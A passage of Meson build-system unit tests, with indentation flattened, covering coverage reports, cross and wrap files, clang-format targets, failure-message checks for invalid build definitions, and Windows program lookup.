try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '206 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '41 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '225 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = {k for k,v in md_command_sections.items()}
help_output = self._run(self.meson_command + ['--help'])
help_commands = {c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(',')}
self.assertEqual(md_commands | {'help'}, help_commands, f'Doc file: `{doc_path}`')
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'{{ ' + command + r'_usage.inc }}[\r\n]'
r'.*?'
r'{{ ' + command + r'_arguments.inc }}[\r\n]',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, f'Command `{command}` is missing placeholders for dynamic data. Doc file: `{doc_path}`')
def _check_coverage_files(self, types=('text', 'xml', 'html')):
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg=f'{f} is not a file')
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '105 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '81 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '228 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
'Requires ASM compiler for x86 or x86_64 platform currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '78 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '82 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
os.makedirs(os.path.dirname(real_wrap))
# Invalid redirect, filename must have .wrap extension
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrapper
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename cannot be in parent directory
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = ../real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename must be in foo/subprojects/real.wrap
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
wrap = PackageDefinition(redirect_wrap)
# Correct redirect
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrap
'''))
with open(real_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = http://invalid
'''))
wrap = PackageDefinition(redirect_wrap)
self.assertEqual(wrap.get('url'), 'http://invalid')
@skip_if_no_cmake
def test_nested_cmake_rebuild(self) -> None:
# This checks a bug where if a non-meson project is used as a third
# level (or deeper) subproject it doesn't cause a rebuild if the build
# files for that project are changed
testdir = os.path.join(self.unit_test_dir, '85 nested subproject regenerate depends')
cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
self.init(testdir)
self.build()
with cmakefile.open('a') as f:
os.utime(str(cmakefile))
self.assertReconfiguredBuildIsNoop()
def test_version_file(self):
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir)
projinfo = self.introspect('--projectinfo')
self.assertEqual(projinfo['version'], '1.0.0')
def test_cflags_cppflags(self):
envs = {'CPPFLAGS': '-DCPPFLAG',
'CFLAGS': '-DCFLAG',
'CXXFLAGS': '-DCXXFLAG'}
srcdir = os.path.join(self.unit_test_dir, '89 multiple envvars')
self.init(srcdir, override_envvars=envs)
self.build()
def test_build_b_options(self) -> None:
# Currently (0.57) these do nothing, but they've always been allowed
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir, extra_args=['-Dbuild.b_lto=true'])
def test_install_skip_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '92 install skip subprojects')
self.init(testdir)
self.build()
main_expected = [
'',
'share',
'include',
'foo',
'bin',
'share/foo',
'share/foo/foo.dat',
'include/foo.h',
'foo/foofile',
'bin/foo' + exe_suffix,
]
bar_expected = [
'bar',
'share/foo/bar.dat',
'include/bar.h',
'bin/bar' + exe_suffix,
'bar/barfile'
]
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() == 'msvc':
main_expected.append('bin/foo.pdb')
bar_expected.append('bin/bar.pdb')
prefix = destdir_join(self.installdir, self.prefix)
main_expected = [Path(prefix, p) for p in main_expected]
bar_expected = [Path(prefix, p) for p in bar_expected]
all_expected = main_expected + bar_expected
def check_installed_files(extra_args, expected):
args = ['install', '--destdir', self.installdir] + extra_args
self._run(self.meson_command + args, workdir=self.builddir)
all_files = [p for p in Path(self.installdir).rglob('*')]
self.assertEqual(sorted(expected), sorted(all_files))
windows_proof_rmtree(self.installdir)
check_installed_files([], all_expected)
check_installed_files(['--skip-subprojects'], main_expected)
check_installed_files(['--skip-subprojects', 'bar'], main_expected)
check_installed_files(['--skip-subprojects', 'another'], all_expected)
def test_adding_subproject_to_configure_project(self) -> None:
srcdir = os.path.join(self.unit_test_dir, '93 new subproject in configured project')
self.init(srcdir)
self.build()
self.setconf('-Duse-sub=true')
self.build()
def test_devenv(self):
testdir = os.path.join(self.unit_test_dir, '91 devenv')
self.init(testdir)
self.build()
cmd = self.meson_command + ['devenv', '-C', self.builddir]
script = os.path.join(testdir, 'test-devenv.py')
app = os.path.join(self.builddir, 'app')
self._run(cmd + python_command + [script])
self.assertEqual('This is text.', self._run(cmd + [app]).strip())
def test_clang_format_check(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest(f'Skipping clang-format tests with {self.backend.name} backend')
if not shutil.which('clang-format'):
raise unittest.SkipTest('clang-format not found')
testdir = os.path.join(self.unit_test_dir, '94 clangformat')
newdir = os.path.join(self.builddir, 'testdir')
shutil.copytree(testdir, newdir)
self.new_builddir()
self.init(newdir)
# Should reformat 1 file but not return error
output = self.build('clang-format')
self.assertEqual(1, output.count('File reformatted:'))
# Reset source tree then try again with clang-format-check, it should
# return an error code this time.
windows_proof_rmtree(newdir)
shutil.copytree(testdir, newdir)
with self.assertRaises(subprocess.CalledProcessError):
output = self.build('clang-format-check')
self.assertEqual(1, output.count('File reformatted:'))
# The check format should not touch any files. Thus
# running format again has some work to do.
output = self.build('clang-format')
self.assertEqual(1, output.count('File reformatted:'))
self.build('clang-format-check')
def test_custom_target_implicit_include(self):
testdir = os.path.join(self.unit_test_dir, '95 custominc')
self.init(testdir)
self.build()
compdb = self.get_compdb()
matches = 0
for c in compdb:
if 'prog.c' in c['file']:
self.assertNotIn('easytogrepfor', c['command'])
matches += 1
self.assertEqual(matches, 1)
matches = 0
for c in compdb:
if 'prog2.c' in c['file']:
self.assertIn('easytogrepfor', c['command'])
matches += 1
self.assertEqual(matches, 1)
def test_env_flags_to_linker(self) -> None:
# Compilers that act as drivers should add their compiler flags to the
# linker, those that do not shouldn't
with mock.patch.dict(os.environ, {'CFLAGS': '-DCFLAG', 'LDFLAGS': '-flto'}):
env = get_fake_env()
# Get the compiler so we know which compiler class to mock.
cc = env.detect_compiler_for('c', MachineChoice.HOST)
cc_type = type(cc)
# Test a compiler that acts as a linker
with mock.patch.object(cc_type, 'INVOKES_LINKER', True):
cc = env.detect_compiler_for('c', MachineChoice.HOST)
link_args = env.coredata.get_external_link_args(cc.for_machine, cc.language)
self.assertEqual(sorted(link_args), sorted(['-DCFLAG', '-flto']))
# And one that doesn't
with mock.patch.object(cc_type, 'INVOKES_LINKER', False):
cc = env.detect_compiler_for('c', MachineChoice.HOST)
link_args = env.coredata.get_external_link_args(cc.for_machine, cc.language)
self.assertEqual(sorted(link_args), sorted(['-flto']))
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(f", meson_version: '{meson_version}'")
f.write(")\n")
for lang in langs:
f.write(f"add_languages('{lang}', required : false)\n")
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(f", meson_version: '{meson_version}'")
f.write(")\n")
for lang in langs:
f.write(f"add_languages('{lang}', required : false)\n")
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
f"(requires a Objc compiler|{self.dnf})",
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
f"(required.*fail|{self.dnf})")
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
f"(fail.*not found|{self.dnf})")
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
f"(boost_root.*absolute|{self.dnf})",
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. A wrap file from a subproject is used but fails because it does not
contain required keys.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
stray_file = os.path.join(tdir, 'subprojects/subsubproject.wrap')
if os.path.exists(stray_file):
windows_proof_rm(stray_file)
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
windows_proof_rm(stray_file)
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
def test_error_func(self):
self.assertMesonRaises("error('a', 'b', ['c', ['d', {'e': 'f'}]], 'g')",
r"Problem encountered: a b \['c', \['d', {'e' : 'f'}\]\] g")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg=f'{cmd_path!r} not found')
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
